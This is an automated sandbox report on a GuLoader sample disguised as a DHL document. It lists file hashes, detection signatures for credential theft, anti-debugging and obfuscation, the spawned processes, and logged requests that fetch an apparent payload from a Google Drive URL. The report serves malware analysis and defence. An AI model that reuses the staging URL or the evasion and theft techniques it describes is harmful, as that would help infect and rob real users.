Edit tour

Windows Analysis Report
documentos DHL.exe

Overview

General Information

Sample Name:	documentos DHL.exe
Analysis ID:	755464
MD5:	ca1cd0656568af4f58aa28e61a3e3edb
SHA1:	1fde05eb6e587047d8a47950bcb2efdb53409b42
SHA256:	6931d5a8ac6e00c855139d9da394b7895d83a9a18a8974c0b2381c5a28e68678
Infos:

Detection

GuLoader

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Tries to steal Mail credentials (via file / registry access)

Initial sample is a PE file and has a suspicious name

Found stalling execution ending in API Sleep call

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Tries to harvest and steal ftp login credentials

Executable has a suspicious name (potential lure to open the executable)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality for execution timing, often used to detect debuggers

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

PE file contains more sections than normal

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

documentos DHL.exe (PID: 7424 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: CA1CD0656568AF4F58AA28E61A3E3EDB)

ieinstal.exe (PID: 8576 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 7871873BABCEA94FBA13900B561C7C55)

ieinstal.exe (PID: 8584 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 7871873BABCEA94FBA13900B561C7C55)

ieinstal.exe (PID: 8596 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 7871873BABCEA94FBA13900B561C7C55)

ieinstal.exe (PID: 8604 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 7871873BABCEA94FBA13900B561C7C55)

ieinstal.exe (PID: 8612 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 7871873BABCEA94FBA13900B561C7C55)

ieinstal.exe (PID: 8620 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 7871873BABCEA94FBA13900B561C7C55)

ieinstal.exe (PID: 8628 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 7871873BABCEA94FBA13900B561C7C55)

ieinstal.exe (PID: 8640 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 7871873BABCEA94FBA13900B561C7C55)

ieinstal.exe (PID: 8648 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 7871873BABCEA94FBA13900B561C7C55)

ieinstal.exe (PID: 8672 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 7871873BABCEA94FBA13900B561C7C55)

ieinstal.exe (PID: 8680 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 7871873BABCEA94FBA13900B561C7C55)

ielowutil.exe (PID: 8688 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 650FE7460630188008BF8C8153526CEB)

ielowutil.exe (PID: 8696 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 650FE7460630188008BF8C8153526CEB)

ielowutil.exe (PID: 8704 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 650FE7460630188008BF8C8153526CEB)

ielowutil.exe (PID: 8712 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 650FE7460630188008BF8C8153526CEB)

ielowutil.exe (PID: 8720 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 650FE7460630188008BF8C8153526CEB)

ielowutil.exe (PID: 8728 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 650FE7460630188008BF8C8153526CEB)

ielowutil.exe (PID: 8736 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 650FE7460630188008BF8C8153526CEB)

ielowutil.exe (PID: 8748 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 650FE7460630188008BF8C8153526CEB)

ielowutil.exe (PID: 8760 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 650FE7460630188008BF8C8153526CEB)

ielowutil.exe (PID: 8776 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 650FE7460630188008BF8C8153526CEB)

ExtExport.exe (PID: 8784 cmdline: C:\Users\user\Desktop\documentos DHL.exe MD5: 3253FD643C51C133C3489A146781913B)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000025.00000000.1618126975.0000000002A00000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: documentos DHL.exe

ReversingLabs: Detection: 17%

Source: documentos DHL.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 142.250.74.206:443 -> 192.168.11.20:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.65:443 -> 192.168.11.20:49803 version: TLS 1.2

Source: documentos DHL.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_004066F3 FindFirstFileW,FindClose,	2_2_004066F3
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	2_2_00405ABE
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_00402862 FindFirstFileW,	2_2_00402862

Source: C:\Users\user\Desktop\documentos DHL.exe	File opened: C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition\Americanly.Unc	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	File opened: C:\Users\user\AppData\Local\Temp\nsd3BF8.tmp	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	File opened: C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	File opened: C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition\Strukturerne.Pom	Jump to behavior

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1lmBjkmJX2WixZUvaKmoyB8cex-DCePE2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cus72g9uti9p4sqam1k45t4h3de3hhkd/1669658550000/01268323115933183181/*/1lmBjkmJX2WixZUvaKmoyB8cex-DCePE2?e=download&uuid=e0f4c7f4-041c-4571-801a-cda7ca0f1ae2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-90-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: ExtExport.exe, 00000025.00000003.1809581126.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000003.1802976587.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000003.1803583412.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000002.1822393701.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: ExtExport.exe, 00000025.00000003.1809581126.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000003.1802976587.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000003.1803583412.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000002.1822393701.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: documentos DHL.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: ExtExport.exe, 00000025.00000003.1802976587.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000003.1803583412.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
Source: ExtExport.exe, 00000025.00000003.1809581126.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000002.1822393701.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-04-90-docs.googleusercontent.com/
Source: ExtExport.exe, 00000025.00000003.1809581126.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-04-90-docs.googleusercontent.com/:
Source: ExtExport.exe, 00000025.00000003.1809581126.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000002.1822393701.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-04-90-docs.googleusercontent.com/=
Source: ExtExport.exe, 00000025.00000002.1822822611.0000000002E46000.00000004.00000020.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000003.1809581126.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000003.1802976587.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000002.1821975252.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000003.1803583412.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-04-90-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cus72g9u
Source: ExtExport.exe, 00000025.00000002.1821244010.0000000002D78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: ExtExport.exe, 00000025.00000002.1821244010.0000000002D78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/d
Source: ExtExport.exe, 00000025.00000002.1821244010.0000000002D78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lmBjkmJX2WixZUvaKmoyB8cex-DCePE2
Source: ExtExport.exe, 00000025.00000003.1810822160.000000001E7BA000.00000004.00001000.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000003.1810628390.000000001E7B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: ExtExport.exe, 00000025.00000003.1810822160.000000001E7BA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: ExtExport.exe, 00000025.00000003.1810822160.000000001E7BA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: ExtExport.exe, 00000025.00000003.1810822160.000000001E7BA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1lmBjkmJX2WixZUvaKmoyB8cex-DCePE2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cus72g9uti9p4sqam1k45t4h3de3hhkd/1669658550000/01268323115933183181/*/1lmBjkmJX2WixZUvaKmoyB8cex-DCePE2?e=download&uuid=e0f4c7f4-041c-4571-801a-cda7ca0f1ae2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-90-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.250.74.206:443 -> 192.168.11.20:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.65:443 -> 192.168.11.20:49803 version: TLS 1.2

Source: C:\Users\user\Desktop\documentos DHL.exe

Code function: 2_2_00405553 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

2_2_00405553

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: documentos DHL.exe

Executable has a suspicious name (potential lure to open the executable)

Source: documentos DHL.exe

Static file information: Suspicious name

Source: documentos DHL.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\documentos DHL.exe

Code function: 2_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

2_2_00403489

Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_00404D90	2_2_00404D90
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_00406ABA	2_2_00406ABA
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0338F535	2_2_0338F535
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337133E	2_2_0337133E
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372B3E	2_2_03372B3E
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03378B2A	2_2_03378B2A
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03377B14	2_2_03377B14
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337231C	2_2_0337231C
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372719	2_2_03372719
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03371F0F	2_2_03371F0F
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372F0E	2_2_03372F0E
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337B70E	2_2_0337B70E
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0338E704	2_2_0338E704
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03377373	2_2_03377373
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372F7C	2_2_03372F7C
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372763	2_2_03372763
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03371760	2_2_03371760
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03371F6F	2_2_03371F6F
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337236E	2_2_0337236E
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370750	2_2_03370750
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337675F	2_2_0337675F
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370F5A	2_2_03370F5A
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370B42	2_2_03370B42
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033727B7	2_2_033727B7
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370BB9	2_2_03370BB9
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372BA4	2_2_03372BA4
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0338FB9A	2_2_0338FB9A
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337139F	2_2_0337139F
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370799	2_2_03370799
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370383	2_2_03370383
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033703FE	2_2_033703FE
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033727F8	2_2_033727F8
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03376FEF	2_2_03376FEF
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033717D6	2_2_033717D6
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337BBD5	2_2_0337BBD5
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03371FD4	2_2_03371FD4
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033707DB	2_2_033707DB
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372FDA	2_2_03372FDA
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033723CC	2_2_033723CC
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0338EBC3	2_2_0338EBC3
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337223F	2_2_0337223F
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337263F	2_2_0337263F
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370225	2_2_03370225
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0339021B	2_2_0339021B
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0339260A	2_2_0339260A
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370601	2_2_03370601
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370A0D	2_2_03370A0D
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370E08	2_2_03370E08
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03371670	2_2_03371670
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370E7C	2_2_03370E7C
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03371267	2_2_03371267
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370A62	2_2_03370A62
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372A68	2_2_03372A68
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03377258	2_2_03377258
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372E41	2_2_03372E41
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033776B4	2_2_033776B4
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033706A6	2_2_033706A6
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372EAF	2_2_03372EAF
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03378EAF	2_2_03378EAF
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03377691	2_2_03377691
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03371E9D	2_2_03371E9D
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337269D	2_2_0337269D
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337029B	2_2_0337029B
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03378AF6	2_2_03378AF6
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033716F3	2_2_033716F3
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370EFD	2_2_03370EFD
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0338E2E8	2_2_0338E2E8
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033706ED	2_2_033706ED
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03377EEC	2_2_03377EEC
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372AE9	2_2_03372AE9
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033712DD	2_2_033712DD
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033702D9	2_2_033702D9
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03377ED8	2_2_03377ED8
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370AC6	2_2_03370AC6
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033722C0	2_2_033722C0
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337293D	2_2_0337293D
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372D3A	2_2_03372D3A
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370925	2_2_03370925
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03377124	2_2_03377124
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372528	2_2_03372528
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372D75	2_2_03372D75
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372D73	2_2_03372D73
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337B57F	2_2_0337B57F
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337057E	2_2_0337057E
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03377578	2_2_03377578
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337BD78	2_2_0337BD78
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372D67	2_2_03372D67
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03371566	2_2_03371566
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372D65	2_2_03372D65
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372D63	2_2_03372D63
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372D61	2_2_03372D61
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372D6F	2_2_03372D6F
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337B56F	2_2_0337B56F
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372D6D	2_2_03372D6D
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372D6B	2_2_03372D6B
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03383D65	2_2_03383D65
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372D69	2_2_03372D69
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372169	2_2_03372169
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03377569	2_2_03377569
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370155	2_2_03370155
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372D55	2_2_03372D55
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372D53	2_2_03372D53
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372D51	2_2_03372D51
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03371150	2_2_03371150
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370D50	2_2_03370D50
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372D5F	2_2_03372D5F
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03378D5E	2_2_03378D5E
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337055D	2_2_0337055D
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372D5D	2_2_03372D5D
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372D5B	2_2_03372D5B
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372D59	2_2_03372D59
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372D4B	2_2_03372D4B
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033775B7	2_2_033775B7
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372DB2	2_2_03372DB2
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033911B4	2_2_033911B4
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033729A6	2_2_033729A6
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372DAC	2_2_03372DAC
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337B9AC	2_2_0337B9AC
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033709AA	2_2_033709AA
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03378DA9	2_2_03378DA9
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03377994	2_2_03377994
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370D92	2_2_03370D92
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337BD8C	2_2_0337BD8C
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033779FF	2_2_033779FF
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033715E9	2_2_033715E9
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033721DD	2_2_033721DD
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033701C7	2_2_033701C7
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372DC5	2_2_03372DC5
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033725C0	2_2_033725C0
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03377038	2_2_03377038
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03377027	2_2_03377027
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337082F	2_2_0337082F
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03378C2C	2_2_03378C2C
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03391419	2_2_03391419
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03371416	2_2_03371416
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370010	2_2_03370010
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372019	2_2_03372019
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370C19	2_2_03370C19
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337C007	2_2_0337C007
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372C04	2_2_03372C04
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337C07E	2_2_0337C07E
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337207C	2_2_0337207C
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370464	2_2_03370464
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370C63	2_2_03370C63
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337006F	2_2_0337006F
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03377468	2_2_03377468
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0339085F	2_2_0339085F
